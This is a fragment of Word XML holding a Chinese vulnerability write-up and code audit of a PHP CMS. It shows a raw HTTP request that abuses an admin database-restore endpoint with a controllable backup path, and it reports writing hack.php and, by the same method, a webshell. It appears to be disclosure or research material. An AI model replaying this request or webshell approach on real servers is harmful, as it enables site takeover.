          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%2fupload%2fsort%2f1694774144356368.bak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sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞数据包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="4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/admin/save.php?act=restore HTTP/1.1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Host: localhost:8089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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0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Accept: */*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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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Content-Type: application/x-www-form-urlencoded; charset=UTF-8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X-Requested-With: XMLHttpRequest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Content-Length: 39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Origin: http://localhost:8089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Connection: close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Referer: http://localhost:8089/admin/?act=datebackuplist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Cookie: zzz389_adminpass=1; PHPSESSID=jfk2mts7unak1qa31fildvupl7; zzz811_token=d7be3baac1ee456de001dc36f50e795f; zzz863_adminpass=0; zzz863_adminname=admin; zzz863_admintime=1694772452; zzz863_adminface=..%2Fplugins%2Fface%2Fface01.png; zzz811_upload=[{"url":"/upload/sort/1694774144356368.bak","title":"hacker.bak"}]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Sec-Fetch-Dest: empty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Sec-Fetch-Mode: cors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Sec-Fetch-Site: same-origin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path=%2fupload%2fsort%2f1694774144356368.bak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sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>12.恢复成功，本地查看创建php文件的路径，发现确实创建了hack.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2894965"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>并且访问路径http://localhost:8089/admin/hack.php，确实执行了hack.php中的测试内容&lt;?php phpinfo();?&gt;,使用同样的思路，可以在伪造的数据库备份文件中写入创建木马文件的语句getshell.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822065"/>
            <wp:effectExtent l="0" t="0" r="10795" b="63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ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="宋体" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs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Georgia" w:hAnsi="Georgia" w:eastAsia="宋体" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs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代码审计过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="191970"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w: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  <w:t>在/admin/save.php中存在进行数据库还原的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="191970"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>restore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="191970"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="191970"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24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2481580</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>386080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="672465" cy="101600"/>
                <wp:effectExtent l="0" t="36830" r="635" b="1397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" idx="1"/>
                        <a:endCxn id="8" idx="3"/>
                      </wps:cNvCnPr>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="3624580" y="3479800"/>
                          <a:ext cx="672465" cy="101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95.4pt;margin-top:30.4pt;height:8pt;width:52.95pt;z-index:251666432;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAi4UX59kAAAAJ&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2Py07DMBBF90j8gzVI7KgdQG4b4lSoCATLBqTCbhq7cYQf&#10;IXYf8PVMV7AajebqzLnV4ugd25sx9TEoKCYCmAlt1H3oFLy9Pl7NgKWMQaOLwSj4NgkW9flZhaWO&#10;h7Ay+yZ3jCAhlajA5jyUnKfWGo9pEgcT6LaNo8dM69hxPeKB4N7xayEk99gH+mBxMEtr2s9m5xVM&#10;P7bNcv38tMaXn/69eCi+7L2TSl1eFOIOWDbH/BeGkz6pQ01Om7gLOjGn4GYuSD0rkKdJgdu5nALb&#10;EF3OgNcV/9+g/gVQSwMEFAAAAAgAh07iQKCeacw+AgAARQQAAA4AAABkcnMvZTJvRG9jLnhtbK1T&#10;zY7TMBC+I/EOlu80bbfbdqOmK9GycEBQiZ+76ziJJf9p7G3al+AFkDixnIDT3nkaWB6DsZP9Ybns&#10;gRycscfzzXyfZxane63IToCX1hR0NBhSIgy3pTR1Qd+9PXsyp8QHZkqmrBEFPQhPT5ePHy1al4ux&#10;bawqBRAEMT5vXUGbEFyeZZ43QjM/sE4YdFYWNAu4hTorgbWIrlU2Hg6nWWuhdGC58B5P152T9ojw&#10;EEBbVZKLteXnWpjQoYJQLCAl30jn6TJVW1WCh9dV5UUgqqDINKQVk6C9jWu2XLC8BuYayfsS2ENK&#10;uMdJM2kw6Q3UmgVGzkH+A6UlB+ttFQbc6qwjkhRBFqPhPW3eNMyJxAWl9u5GdP//YPmr3QaILLET&#10;UBLDNL741cfLXx8urr5/+/n58vePT9H++oWgH8Vqnc8xZmU2EOn6sNqbFH5C8bdHmE5SYcprD/ZT&#10;8hxFT/YXQNx410HtK9CkUtK9iCDJeh+tmAZ1Ioh9NB1PjudY5wHtyexkPuwfUOwD4XhhOhtPpseU&#10;cLwwGo6mnT9jeQSPQA58eC6sJtEoqA/AZN2ElTUGW8VCl47tXvoQi70NiMHGnkmlUscoQ1pMMZ5h&#10;BsIZjkGF7YemdiilNzUlTNU4XzxAYuCtkmUMT6pBvV0pIDuGXTmZzyarp0kb1PPutVjjmvmmu5dc&#10;nbhaBhxBJXVBUQL8uuPApHpmShIODl+RAdi2h1WmV74TO8q+teVhA9cvgt2V6PaTENv37j5F307/&#10;8g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LhRfn2QAAAAkBAAAPAAAAAAAAAAEAIAAAACIAAABk&#10;cnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAoJ5pzD4CAABFBAAADgAAAAAAAAABACAAAAAo&#10;AQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAA2AUAAAAA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3154045</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>135255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3035935" cy="704215"/>
                <wp:effectExtent l="4445" t="4445" r="7620" b="1524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27830" y="3387725"/>
                          <a:ext cx="3035935" cy="704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0000FF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FF"/>
                                <w:sz w:val="18"/>
                                <w:szCs w:val="21"/>
                                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                              </w:rPr>
                              <w:t>$path通过post方法传入，是可控的,而safe_url只是进行了一些基础过滤，并不严格。而下面的$backpath正是使用$path进行拼接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8.35pt;margin-top:10.65pt;height:55.45pt;width:239.05pt;z-index:251665408;mso-width-relative:page;mso-height-relative:page;" fillcolor="#FFFFFF [3201]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJA20VZQNcAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PwU7DMBBE70j8g7VI3KgTp0ppiFMJJCTEjTYXbm68TSLs&#10;dRS7Tfl7lhMcV/s086beXb0TF5zjGEhDvspAIHXBjtRraA+vD48gYjJkjQuEGr4xwq65valNZcNC&#10;H3jZp15wCMXKaBhSmiopYzegN3EVJiT+ncLsTeJz7qWdzcLh3kmVZaX0ZiRuGMyELwN2X/uz1/BW&#10;PqdPbO27LVQRllZ288lFre/v8uwJRMJr+oPhV5/VoWGnYziTjcJpWG/LDaMaVF6AYGC7WfOWI5OF&#10;UiCbWv6f0PwAUEsDBBQAAAAIAIdO4kArNDBoZwIAAMMEAAAOAAAAZHJzL2Uyb0RvYy54bWytVEtu&#10;2zAQ3RfoHQjuG8mSHX8QOXAduCgQNAHcomuaoiyhJIclaUvpAdobdNVN9z1XztEhZefbRRb1gp7h&#10;PL/hvJnx2XmnJNkL6xrQBR2cpJQIzaFs9Lagnz6u3kwocZ7pkknQoqA3wtHz+etXZ62ZiQxqkKWw&#10;BEm0m7WmoLX3ZpYkjtdCMXcCRmgMVmAV8+jabVJa1iK7kkmWpqdJC7Y0FrhwDm8v+iA9MNqXEEJV&#10;NVxcAN8poX3PaoVkHktydWMcncfXVpXg/qqqnPBEFhQr9fHEJGhvwpnMz9hsa5mpG354AnvJE57U&#10;pFijMekd1QXzjOxs84xKNdyCg8qfcFBJX0hUBKsYpE+0WdfMiFgLSu3Mneju/9HyD/trS5qyoFNK&#10;NFPY8NufP25//bn9/Z1MgzytcTNErQ3ifPcWOhya473Dy1B1V1kVvrEegvFhlo0nOUp8U9A8n4zH&#10;2agXWnSecATkaT6a5iNKOCLG6TAbREByz2Ss8+8EKBKMglpsZNSX7S+dx1ch9AgJiR3Iplw1UkbH&#10;bjdLacmeYdNX8RPS408ewaQmbUFP81EamR/FAvcdxUYy/uU5A/JJjbRBoF6IYPlu0x1U20B5g6JZ&#10;6KfOGb5qkPeSOX/NLI4ZKoSL6K/wqCTgY+BgUVKD/fav+4DH7mOUkhbHtqDu645ZQYl8r3EupoPh&#10;MMx5dIajcYaOfRjZPIzonVoCijTAlTc8mgHv5dGsLKjPuK+LkBVDTHPMXVB/NJe+Xybcdy4WiwjC&#10;yTbMX+q14YE6tETDYuehamLrgky9Ngf1cLZjew57GJbnoR9R9/898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bRVlA1wAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwEC&#10;FAAUAAAACACHTuJAKzQwaGcCAADDBAAADgAAAAAAAAABACAAAAAm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0000FF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0000FF"/>
                          <w:sz w:val="18"/>
                          <w:szCs w:val="21"/>
                          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                        </w:rPr>
                        <w:t>$path通过post方法传入，是可控的,而safe_url只是进行了一些基础过滤，并不严格。而下面的$backpath正是使用$path进行拼接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265430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>274955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2216150" cy="222250"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="127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08430" y="3368675"/>
                          <a:ext cx="2216150" cy="22225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.9pt;margin-top:21.65pt;height:17.5pt;width:174.5pt;z-index:251664384;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAd124ldUAAAAI&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PQU/DMAyF70j8h8iTuLGkFLHRNd0BsRMHYEzimjWmrdY4&#10;UZJu5d9jTnCy7Ge/97nezm4UZ4xp8KShWCoQSK23A3UaDh+72zWIlA1ZM3pCDd+YYNtcX9Wmsv5C&#10;73je506wCaXKaOhzDpWUqe3RmbT0AYm1Lx+dydzGTtpoLmzuRnmn1IN0ZiBO6E3Apx7b035yjBHG&#10;t2Cn19Phs5h38dm+JNOttL5ZFGoDIuOc/5bhF59voGGmo5/IJjFquC+YPHMtSxCsl4+KB0cNq3UJ&#10;sqnl/weaH1BLAwQUAAAACACHTuJAU+vhOXQCAADXBAAADgAAAGRycy9lMm9Eb2MueG1srVTdbtMw&#10;GL1H4h0s37OkWdeVqulUrSpCmtikgbh2Haex5D9st+l4GSTueIg9DuI1OE6yrQwudkEunM/+Ph/7&#10;HB97fnHQiuyFD9Kako5OckqE4baSZlvSTx/Xb6aUhMhMxZQ1oqR3ItCLxetX89bNRGEbqyrhCUBM&#10;mLWupE2MbpZlgTdCs3BinTBI1tZrFtH126zyrAW6VlmR55Ostb5y3nIRAkZXfZIOiP4lgLauJRcr&#10;y3damNijeqFYBKXQSBfootttXQser+s6iEhUScE0di0WQbxJbbaYs9nWM9dIPmyBvWQLzzhpJg0W&#10;fYRascjIzsu/oLTk3gZbxxNuddYT6RQBi1H+TJvbhjnRcYHUwT2KHv4fLP+wv/FEViXFsRumceC/&#10;vv34ef+dTJM2rQszlNy6Gz/0AsJE9FB7nf6gQA7w0Tifjk+h6l1JT08n08n5Wa+tOETCUVAUo8no&#10;DAUcFQU+xIDMnpCcD/GdsJqkoKQeZ9dJyvZXIfalDyVpYWPXUimMs5kypMUWivM84TOYsoYZEGoH&#10;YsFsKWFqC7fz6DvIYJWs0vQ0O/jt5lJ5smfwyHqd4xt29kdZWnvFQtPXdameoZYRF0JJDQ3T5IfZ&#10;yoBeErCXLEUbW91Bbm97HwbH1xKwVyzEG+ZhPOwfVzNeo6mVBSk7RJQ01n/913iqhx+QpaSFkUH4&#10;y455QYl6b+CUt6PxGLCx64zPzgt0/HFmc5wxO31pocMIj4DjXZjqo3oIa2/1Z9zgZVoVKWY41u6l&#10;HTqXsb9geAO4WC67MrjdsXhlbh1P4P0BLnfR1rI72yd1BtHg984dw91MF+q431U9vUeL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HdduJXVAAAACAEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3du&#10;cmV2LnhtbFBLAQIUABQAAAAIAIdO4kBT6+E5dAIAANcEAAAOAAAAAAAAAAEAIAAAACQBAABkcnMv&#10;ZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAAK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2214880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2740025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1174750" cy="317500"/>
                <wp:effectExtent l="0" t="26035" r="6350" b="1206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5" idx="3"/>
                      </wps:cNvCnPr>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1174750" cy="317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74.4pt;margin-top:215.75pt;height:25pt;width:92.5pt;z-index:251663360;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAZe2IhtcAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PQW6DMBBF95VyB2sqddcYQogIxWQRqRLqriEHcLANKHiM&#10;bIckt+901S7nzdefN9XhYSe2aB9GhwLSdQJMY+fUiL2Ac/v5XgALUaKSk0Mt4KkDHOrVSyVL5e74&#10;rZdT7BmVYCilgCHGueQ8dIO2MqzdrJF2xnkrI42+58rLO5XbiW+SZMetHJEuDHLWx0F319PNCtjP&#10;Bjdta7Lleja5+Xo2e980Qry9pskHsKgf8S8Mv/qkDjU5XdwNVWCTgGxbkHoUsM3SHBgl8iwjciFS&#10;EOF1xf//UP8AUEsDBBQAAAAIAIdO4kB+B1VDKAIAAB8EAAAOAAAAZHJzL2Uyb0RvYy54bWytU72O&#10;EzEQ7pF4B8s92STHkdMqmysSAgWCSPz0jtfeteQ/jX3Z5CV4ASQqoDqorudp4HgMxt4ldxzNFWzh&#10;HXs838x883l+vjea7AQE5WxFJ6MxJcJyVyvbVPTtm/WjM0pCZLZm2llR0YMI9Hzx8MG886WYutbp&#10;WgBBEBvKzle0jdGXRRF4KwwLI+eFRad0YFjELTRFDaxDdKOL6Xj8pOgc1B4cFyHg6ap30gER7gPo&#10;pFRcrBy/MMLGHhWEZhFbCq3ygS5ytVIKHl9JGUQkuqLYacwrJkF7m9ZiMWdlA8y3ig8lsPuUcKcn&#10;w5TFpEeoFYuMXID6B8ooDi44GUfcmaJvJDOCXUzGd7h53TIvci9IdfBH0sP/g+Uvdxsgqq7ojBLL&#10;DA78+sPVz/efr799/fHp6tf3j8m+/EJmiarOhxIjlnYDqVlh6+Xe5uhTir99RU/SteKve2kTfB+x&#10;l2CI1Mo/R+nRbL1LVkJDMggi4GQOx8mIfSQcDyeT2ePZKbo4+k4maObRFaxMiCnaQ4jPhDMkGRUN&#10;EZhq2rh01qIIHPQ52O5FiKnCm4AUbN1aaZ21oC3pMN90hhkIZyhwicJC03gkKdiGEqYbfDk8Qi47&#10;OK3qFJ6AAjTbpQayY6i39XqMXyYEPbevpRpXLLT9vezqlWhUxMellanoWQoeBBqZ0k9tTeLB44AY&#10;gOsGWG0HunuGE9dbVx828GcMqJvc7qDxJMzb+xx9864X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l7YiG1wAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAA&#10;CACHTuJAfgdVQygCAAAfBAAADgAAAAAAAAABACAAAAAmAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAA&#10;AAYABgBZAQAAwAUAAAAA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6832600" cy="3493135"/>
            <wp:effectExtent l="0" t="0" r="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2754630</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2317750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="628650" cy="643890"/>
                <wp:effectExtent l="0" t="0" r="6350" b="1651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" idx="1"/>
                        <a:endCxn id="3" idx="3"/>
                      </wps:cNvCnPr>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="3954780" y="5389245"/>
                          <a:ext cx="628650" cy="643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16.9pt;margin-top:182.5pt;height:50.7pt;width:49.5pt;z-index:251662336;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAIH/KDNcAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PwW6DMBBE75X6D9ZG6q0xgYASgsmhUiXUW0M+wME2oOA1&#10;sh2S/H23p/a4M6PZN9XxYSe2aB9GhwI26wSYxs6pEXsB5/bzfQcsRIlKTg61gKcOcKxfXypZKnfH&#10;b72cYs+oBEMpBQwxziXnoRu0lWHtZo3kGeetjHT6nisv71RuJ54mScGtHJE+DHLWH4PurqebFbCf&#10;DaZta7Lleja5+Xo2e980QrytNskBWNSP+BeGX3xCh5qYLu6GKrBJwDbLCD0KyIqcRlEiz1JSLmQV&#10;xRZ4XfH/G+ofUEsDBBQAAAAIAIdO4kC6lo7pOwIAAEMEAAAOAAAAZHJzL2Uyb0RvYy54bWytU0uS&#10;0zAQ3VPFHVTaE3vym0wqziwSAgsKUsVnr8iyrSr9qqWJk0twAapYAStgNXtOA8MxaMmeD8NmFnhh&#10;t9zdr/s9dS/OD1qRvQAvrSnoySCnRBhuS2nqgr59s3kyo8QHZkqmrBEFPQpPz5ePHy1aNxdD21hV&#10;CiAIYvy8dQVtQnDzLPO8EZr5gXXCoLOyoFnAI9RZCaxFdK2yYZ5Ps9ZC6cBy4T3+XXdO2iPCQwBt&#10;VUku1pZfaGFChwpCsYCUfCOdp8vUbVUJHl5VlReBqIIi05DeWATtXXxnywWb18BcI3nfAntIC/c4&#10;aSYNFr2BWrPAyAXIf6C05GC9rcKAW511RJIiyOIkv6fN64Y5kbig1N7diO7/Hyx/ud8CkWVBp5QY&#10;pvHCrz5c/nr/+er7t5+fLn//+Bjtr1/INErVOj/HjJXZQiTrw+pgUvKY4ueA49QJKkx57Rn1nlH0&#10;ZH8BxIN3HdShAk0qJd3zCJKsd9GKZVAlgtijs8n4dIYXdyzoZDQ7G44nfbVDIBwDpsPZdIJ+jgHT&#10;MUak683YPIJHIAc+PBNWk2gU1Adgsm7CyhqDg2KhK8f2L3yIzd4mxGRjN1KpNC/KkBabG57msRrD&#10;Jahw+NDUDoX0pqaEqRq3iwdIDLxVsozpSTWodysFZM9wJjebHJ+kDep5Nyz2uGa+6eKSq6OrZcAF&#10;VFIXdBaT+yEOTKqnpiTh6PASGYBte1hleuU7saPsO1set3B9IzhbiW6/B3F4755T9u3uL/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IH/KDNcAAAALAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rv&#10;d25yZXYueG1sUEsBAhQAFAAAAAgAh07iQLqWjuk7AgAAQwQAAA4AAAAAAAAAAQAgAAAAJgEAAGRy&#10;cy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAANMFAAAAAA=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855980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2670175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1358900" cy="139700"/>
                <wp:effectExtent l="6350" t="6350" r="6350" b="63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98980" y="5763895"/>
                          <a:ext cx="1358900" cy="13970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7.4pt;margin-top:210.25pt;height:11pt;width:107pt;z-index:251661312;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAoUryn9UAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PMU/DMBCFdyT+g3VIbNROSAGFOB0QnRiAUon1Gpskany2&#10;bKcN/55jgvG9e/fuu2azuEmcbEyjJw3FSoGw1HkzUq9h/7G9eQCRMpLByZPV8G0TbNrLiwZr48/0&#10;bk+73AsuoVSjhiHnUEuZusE6TCsfLPHsy0eHmWXspYl45nI3yVKpO+lwJL4wYLBPg+2Ou9kxRpje&#10;gplfj/vPYtnGZ/OSsL/X+vqqUI8gsl3yXxh+8XkHWmY6+JlMEhPr24rRs4aqVGsQnGCDnQM7VbkG&#10;2Tby/w/tD1BLAwQUAAAACACHTuJAjtxd63UCAADXBAAADgAAAGRycy9lMm9Eb2MueG1srVTLbhMx&#10;FN0j8Q+W93SStGkzo06qqFEQUkUrFcTa8XgylvzCdh7lZ5DY8RF8DuI3OPZMHxQWXZCFcz33+Nj3&#10;+FyfXxy0Ijvhg7SmpuOjESXCcNtIs6npxw+rNzNKQmSmYcoaUdM7EejF/PWr872rxMR2VjXCE5CY&#10;UO1dTbsYXVUUgXdCs3BknTBIttZrFjH1m6LxbA92rYrJaHRa7K1vnLdchICvyz5JB0b/EkLbtpKL&#10;peVbLUzsWb1QLKKk0EkX6Dyftm0Fj9dtG0QkqqaoNOYRmyBep7GYn7Nq45nrJB+OwF5yhGc1aSYN&#10;Nn2gWrLIyNbLv6i05N4G28YjbnXRF5IVQRXj0TNtbjvmRK4FUgf3IHr4f7T8/e7GE9nUdEqJYRoX&#10;/uvr958/vpFp0mbvQgXIrbvxwywgTIUeWq/TP0ogB/ioLGflDKregens9HhW5vWsEodIeAIcT2fl&#10;CAAOxPi4PEMMyuKRyfkQ3wqrSQpq6nF3WVK2uwqxh95D0sbGrqRS+M4qZcgepJPESTiDKVuYAaF2&#10;KCyYDSVMbeB2Hn2mDFbJJi1Pq4PfrC+VJzsGj6xWI/yGk/0BS3svWeh6XE4lGKu0jGgIJXVNZ2nx&#10;/WplUF4SsJcsRWvb3EFub3sfBsdXErRXLMQb5mE8nB+tGa8xtMqiKDtElHTWf/nX94SHH5ClZA8j&#10;o+DPW+YFJeqdgVPK8ckJaGOenEzPJpj4p5n104zZ6ksLHcZ4BBzPYcJHdR+23upP6OBF2hUpZjj2&#10;7qUdJpexbzC8AVwsFhkGtzsWr8yt44m8v8DFNtpW5rt9VGcQDX7P7hh6MzXU03lGPb5H8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hSvKf1QAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93&#10;bnJldi54bWxQSwECFAAUAAAACACHTuJAjtxd63UCAADXBAAADgAAAAAAAAABACAAAAAkAQAAZHJz&#10;L2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAACw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3383280</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2422525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2285365" cy="1077595"/>
                <wp:effectExtent l="5080" t="4445" r="8255" b="1016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38930" y="5319395"/>
                          <a:ext cx="2285365" cy="1077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0000"/>
                                <w:sz w:val="16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20"/>
                                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                              </w:rPr>
                              <w:t>当使用mysql数据库时，提取备份数据库文件的sql创建语句，并且在下面的执行函数中执行这些sql语句,在这个过程中，其还原的数据库备份文件路径$backpath是可控的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6.4pt;margin-top:190.75pt;height:84.85pt;width:179.95pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" fillcolor="#FFFFFF [3201]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAUjFHRdcAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PQUvEMBSE74L/ITzBm5s2pWutTRcUBPHm2ou3bPO2LTYv&#10;Jclu13/v86THYYaZb5rdxc3ijCFOnjTkmwwEUu/tRIOG7uPlrgIRkyFrZk+o4Rsj7Nrrq8bU1q/0&#10;jud9GgSXUKyNhjGlpZYy9iM6Ezd+QWLv6IMziWUYpA1m5XI3S5VlW+nMRLwwmgWfR+y/9ien4XX7&#10;lD6xs2+2UIVfO9mH4xy1vr3Js0cQCS/pLwy/+IwOLTMd/IlsFLOGslCMnjQUVV6C4ET1oO5BHNgq&#10;cwWybeT/D+0PUEsDBBQAAAAIAIdO4kBeTKDZaAIAAMQEAAAOAAAAZHJzL2Uyb0RvYy54bWytVM1u&#10;EzEQviPxDpbvdLNJtm2ibKrQKgipopUC4ux4vVkL22NsJ7vlAeANOHHhznP1ORh7k/5y6IEcnBnP&#10;l28838xkdtZpRXbCeQmmpPnRgBJhOFTSbEr66ePyzSklPjBTMQVGlPRGeHo2f/1q1tqpGEIDqhKO&#10;IInx09aWtAnBTrPM80Zo5o/ACoPBGpxmAV23ySrHWmTXKhsOBsdZC66yDrjwHm8v+iDdM7qXEEJd&#10;Sy4ugG+1MKFndUKxgCX5RlpP5+m1dS14uKprLwJRJcVKQzoxCdrreGbzGZtuHLON5PsnsJc84UlN&#10;mkmDSe+oLlhgZOvkMyotuQMPdTjioLO+kKQIVpEPnmizapgVqRaU2ts70f3/o+UfdteOyKqkY0oM&#10;09jw258/bn/9uf39nYyjPK31U0StLOJC9xY6HJrDvcfLWHVXOx2/sR6C8XE+Op2MUOKbkhajfDKa&#10;FL3QoguEI2A4PC1GxwUlHBH54OSk6BHZPZV1PrwToEk0Suqwk0lgtrv0AZ+F0AMkZvagZLWUSiXH&#10;bdbnypEdw64v0yfmx588gilD2pIej4pBYn4Ui9x3FGvF+JfnDMinDNJGhXolohW6dbeXbQ3VDarm&#10;oB87b/lSIu8l8+GaOZwzlAg3MVzhUSvAx8DeoqQB9+1f9xGP7ccoJS3ObUn91y1zghL13uBgTPLx&#10;OA56csbFyRAd9zCyfhgxW30OKFKOO295MiM+qINZO9CfcWEXMSuGmOGYu6ThYJ6Hfptw4blYLBII&#10;R9uycGlWlkfq2BIDi22AWqbWRZl6bfbq4XCn9uwXMW7PQz+h7v985n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UjFHRdcAAAALAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsB&#10;AhQAFAAAAAgAh07iQF5MoNloAgAAxAQAAA4AAAAAAAAAAQAgAAAAJgEAAGRycy9lMm9Eb2MueG1s&#10;UEsFBgAAAAAGAAYAWQEAAAA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0000"/>
                          <w:sz w:val="16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20"/>
                          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                        </w:rPr>
